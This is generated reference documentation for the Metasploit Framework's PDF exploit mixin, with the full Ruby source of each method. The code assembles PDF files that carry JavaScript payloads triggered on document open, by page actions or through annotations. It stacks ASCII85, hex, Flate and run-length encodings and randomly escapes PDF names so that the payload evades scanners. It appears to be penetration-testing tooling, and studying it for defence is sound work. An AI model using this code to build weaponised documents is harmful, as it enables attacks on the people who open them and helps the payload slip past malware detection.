Module: Msf::Exploit::PDF

Defined in:
lib/msf/core/exploit/pdf.rb

Instance Method Summary collapse

Instance Method Details

#add_object(num, data) ⇒ Object



156
157
158
159
160
161
# File 'lib/msf/core/exploit/pdf.rb', line 156

def add_object(num, data)
  @xref[num] = @pdf.length
  @pdf << io_def(num)
  @pdf << data
  @pdf << endobj
end

#ascii85_encode(stream) ⇒ Object



96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
# File 'lib/msf/core/exploit/pdf.rb', line 96

def ascii85_encode(stream)
  eod = "~>"
  i = 0
  code = ""
  input = stream.dup

  while i < input.size do

    if input.length - i < 4
      addend = 4 - (input.length - i)
      input << "\0" * addend
    else
      addend = 0
    end

    inblock = (input[i].ord * 256**3 + input[i+1].ord * 256**2 + input[i+2].ord * 256 + input[i+3].ord)
    outblock = ""

    5.times do |p|
      c = inblock / 85 ** (4 - p)
      outblock << ("!"[0].ord + c).chr
      inblock -= c * 85 ** (4 - p)
    end

    outblock = "z" if outblock == "!!!!!" and addend == 0

    if addend != 0
      outblock = outblock[0,(4 - addend) + 1]
    end

    code << outblock
    i = i + 4
  end
  code << eod
end

#ascii_hex_whitespace_encode(str) ⇒ Object

Original Filters



33
34
35
36
37
38
39
40
41
42
# File 'lib/msf/core/exploit/pdf.rb', line 33

def ascii_hex_whitespace_encode(str)
  return str if not datastore['PDF::Obfuscate']
  result = ""
  whitespace = ""
  str.each_byte do |b|
    result << whitespace << "%02x" % b
    whitespace = " " * (rand(3) + 1)
  end
  result << ">"
end

#create_pdf(js) ⇒ Object

Controller function, should be entrypoint for pdf exploits



223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
# File 'lib/msf/core/exploit/pdf.rb', line 223

def create_pdf(js)
  strFilter = ""
  arrResults = []
  numIterations = 0
  arrEncodings = ['ASCII85','ASCIIHEX','FLATE','RUN']
  arrEncodings = arrEncodings.shuffle
  if datastore['PDF::MultiFilter'] < arrEncodings.length
    numIterations = datastore['PDF::MultiFilter']
  else
    numIterations = arrEncodings.length
  end
  for i in (0..numIterations-1)
    if i == 0
      arrResults = select_encoder(js,arrEncodings[i],strFilter)
      next
    end
    arrResults = select_encoder(arrResults[0],arrEncodings[i],arrResults[1])
  end
  case datastore['PDF::Method']
  when 'PAGE'
    pdf_with_page_exploit(arrResults[0],arrResults[1])
  when 'DOCUMENT'
    pdf_with_openaction_js(arrResults[0],arrResults[1])
  when 'ANNOTATION'
    pdf_with_annot_js(arrResults[0],arrResults[1])
  end
end

#endobjObject



208
209
210
# File 'lib/msf/core/exploit/pdf.rb', line 208

def endobj
  "endobj" << eol
end

#eolObject



200
201
202
# File 'lib/msf/core/exploit/pdf.rb', line 200

def eol
  @eol || "\x0d\x0a"
end

#eol=(new_eol) ⇒ Object



204
205
206
# File 'lib/msf/core/exploit/pdf.rb', line 204

def eol=(new_eol)
  @eol = new_eol
end

#finish_pdfObject



163
164
165
166
167
168
169
# File 'lib/msf/core/exploit/pdf.rb', line 163

def finish_pdf
  @xref_offset = @pdf.length
  @pdf << xref_table
  @pdf << trailer(1)
  @pdf << startxref
  @pdf
end

#header(version = '1.5') ⇒ Object

PDF building block functions



150
151
152
153
154
# File 'lib/msf/core/exploit/pdf.rb', line 150

def header(version = '1.5')
  hdr = "%PDF-#{version}" << eol
  hdr << "%" << random_non_ascii_string(4) << eol
  hdr
end

#initialize(info = {}) ⇒ Object



12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
# File 'lib/msf/core/exploit/pdf.rb', line 12

def initialize(info = {})
super

register_options(
  [
    OptBool.new('PDF::Obfuscate', [ true, 'Whether or not we should obfuscate the output', true ]),
    OptString.new('PDF::Method', [ true, 'Select PAGE, DOCUMENT, or ANNOTATION' , 'DOCUMENT']),
    OptString.new('PDF::Encoder', [ true, 'Select encoder for JavaScript Stream, valid values are ASCII85, FLATE, and ASCIIHEX', 'ASCIIHEX']),
    OptInt.new('PDF::MultiFilter', [ true, 'Stack multiple encodings n times', 1]),
  ], Msf::Exploit::PDF
)

# We're assuming we'll only create one pdf at a time here.
@xref = {}
@pdf = ''
end

#io_def(id) ⇒ Object



212
213
214
# File 'lib/msf/core/exploit/pdf.rb', line 212

def io_def(id)
  "%d 0 obj" % id
end

#io_ref(id) ⇒ Object



216
217
218
# File 'lib/msf/core/exploit/pdf.rb', line 216

def io_ref(id)
  "%d 0 R" % id
end

#nobfu(str) ⇒ Object



133
134
135
136
137
138
139
140
141
142
143
144
145
# File 'lib/msf/core/exploit/pdf.rb', line 133

def nobfu(str)
  return str if not datastore['PDF::Obfuscate']

  result = ""
  str.scan(/./u) do |c|
    if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
      result << "#%x" % c.unpack("C*")[0]
    else
      result << c
    end
  end
  result
end

#pdf_with_annot_js(js, strFilter) ⇒ Object

Create PDF with a malicious annotation



321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
# File 'lib/msf/core/exploit/pdf.rb', line 321

def pdf_with_annot_js(js,strFilter)
  @xref = {}
  @pdf = ''

  @pdf << header

  add_object(1, nobfu("<</Type/Catalog/Outlines ") << io_ref(2) << nobfu("/Pages ") << io_ref(3) << ">>")
  add_object(2, nobfu("<</Type/Outlines/Count 0>>"))
  add_object(3, nobfu("<</Type/Pages/Kids[") << io_ref(4) << nobfu("]/Count 1>>"))
  add_object(4, nobfu("<</Type/Page/Parent ") << io_ref(3) << nobfu("/MediaBox[%s %s %s %s] " % [rand(200),rand(200),rand(300),rand(300)]) << nobfu(" /Annots [") << io_ref(5) << nobfu("]>>"))
  add_object(5, nobfu("<</Type/Annot /Subtype /Screen /Rect [%s %s %s %s] /AA << /PO << /JS " % [rand(200),rand(200),rand(300),rand(300)]) << io_ref(6) << nobfu("/S /JavaScript >>>>>>"))
  compressed = js
  stream = "<</Length %s/Filter[" % compressed.length << strFilter << "]>>" << eol
  stream << "stream" << eol
  stream << compressed << eol
  stream << "endstream" << eol
  add_object(6, stream)

  finish_pdf
end

#pdf_with_openaction_js(js, strFilter) ⇒ Object

Create PDF with OpenAction implant Note: doesn’t carry over if you try to merge the exploit PDF with an innocuous one



298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
# File 'lib/msf/core/exploit/pdf.rb', line 298

def pdf_with_openaction_js(js,strFilter)
  @xref = {}
  @pdf = ''

  @pdf << header

  add_object(1, nobfu("<</Type/Catalog/Outlines ") << io_ref(2) << nobfu("/Pages ") << io_ref(3) << ">>")
  add_object(2, nobfu("<</Type/Outlines/Count 0>>"))
  add_object(3, nobfu("<</Type/Pages/Kids[") << io_ref(4) << nobfu("]/Count 1>>"))
  add_object(4, nobfu("<</Type/Page/Parent ") << io_ref(3) << nobfu("/MediaBox[%s %s %s %s] " % [rand(200),rand(200),rand(300),rand(300)]) << nobfu(" /AA << /O << /JS ") << io_ref(5) << nobfu("/S /JavaScript >>>>>>"))
  compressed = js
  stream = "<</Length %s/Filter[" % compressed.length << strFilter << "]>>" << eol
  stream << "stream" << eol
  stream << compressed << eol
  stream << "endstream" << eol
  add_object(5, stream)

  finish_pdf
end

#pdf_with_page_exploit(js, strFilter) ⇒ Object

Create PDF with Page implant



275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
# File 'lib/msf/core/exploit/pdf.rb', line 275

def pdf_with_page_exploit(js,strFilter)
  @xref = {}
  @pdf = ''

  @pdf << header
  add_object(1, nobfu("<</Type/Catalog/Outlines ") << io_ref(2) << nobfu("/Pages ") << io_ref(3) << ">>")
  add_object(2, nobfu("<</Type/Outlines/Count 0>>"))
  add_object(3, nobfu("<</Type/Pages/Kids[") << io_ref(4) << nobfu("]/Count 1>>"))
  add_object(4, nobfu("<</Type/Page/Parent ") << io_ref(3) << nobfu("/MediaBox[%s %s %s %s] " % [rand(200),rand(200),rand(300),rand(300)]) << nobfu(" /AA << /O << /JS ") << io_ref(5) << nobfu("/S /JavaScript >>>>>>"))
  compressed = js
  stream = "<</Length %s/Filter[" % compressed.length << strFilter << "]>>" << eol
  stream << "stream" << eol
  stream << compressed << eol
  stream << "endstream" << eol
  add_object(5, stream)

  finish_pdf
end

#random_non_ascii_string(count) ⇒ Object



88
89
90
91
92
93
94
# File 'lib/msf/core/exploit/pdf.rb', line 88

def random_non_ascii_string(count)
  result = ""
  count.times do
    result << (rand(128) + 128).chr
  end
  result
end

#run_length_encode(stream) ⇒ Object

Filters from Origami parser



47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
# File 'lib/msf/core/exploit/pdf.rb', line 47

def run_length_encode(stream)
  eod = 128
  result = ""
  i = 0

  while i < stream.size
    #
    # How many identical bytes coming?
    #
    length = 1
    while i+1 < stream.size and length < eod and stream[i] == stream[i+1]
      length = length + 1
      i = i + 1
    end

    #
    # If more than 1, then compress them.
    #
    if length > 1
      result << (257 - length).chr << stream[i,1]

    #
    # Otherwise how many different bytes to copy ?
    #
    else
      j = i
      while j+1 < stream.size and (j - i + 1) < eod and stream[j] != stream[j+1]
        j = j + 1
      end

      length = j - i
      result << length.chr << stream[i, length+1]

      i = j
    end

    i = i + 1
  end
  result << eod.chr
end

#select_encoder(js, strEncode, strFilter) ⇒ Object

Select an encoder and build a filter specification



254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
# File 'lib/msf/core/exploit/pdf.rb', line 254

def select_encoder(js,strEncode,strFilter)
  case strEncode
  when 'ASCII85'
    js = ascii85_encode(js)
    strFilter = "/ASCII85Decode"<<strFilter
  when 'ASCIIHEX'
    js = ascii_hex_whitespace_encode(js)
    strFilter = "/ASCIIHexDecode"<<strFilter
  when 'FLATE'
    js = Zlib::Deflate.deflate(js)
    strFilter = "/FlateDecode"<<strFilter
  when 'RUN'
    js = run_length_encode(js)
    strFilter = "/RunLengthDecode"<<strFilter
  end
  return js,strFilter
end

#startxrefObject



193
194
195
196
197
198
# File 'lib/msf/core/exploit/pdf.rb', line 193

def startxref
  ret = "startxref" << eol
  ret << @xref_offset.to_s << eol
  ret << "%%EOF" << eol
  ret
end

#trailer(root_obj) ⇒ Object



188
189
190
191
# File 'lib/msf/core/exploit/pdf.rb', line 188

def trailer(root_obj)
  ret = "trailer" << nobfu("<</Size %d/Root " % (@xref.length + 1)) << io_ref(root_obj) << ">>" << eol
  ret
end

#xref_tableObject



171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
# File 'lib/msf/core/exploit/pdf.rb', line 171

def xref_table
  id = @xref.keys.max+1
  ret = "xref" << eol
  ret << "0 %d" % id << eol
  ret << "0000000000 65535 f" << eol
  ret << (1..@xref.keys.max).map do |index|
    if @xref.has_key?(index)
      offset = @xref[index]
      "%010d 00000 n" % offset << eol
    else
      "0000000000 00000 f" << eol
    end
  end.join

  ret
end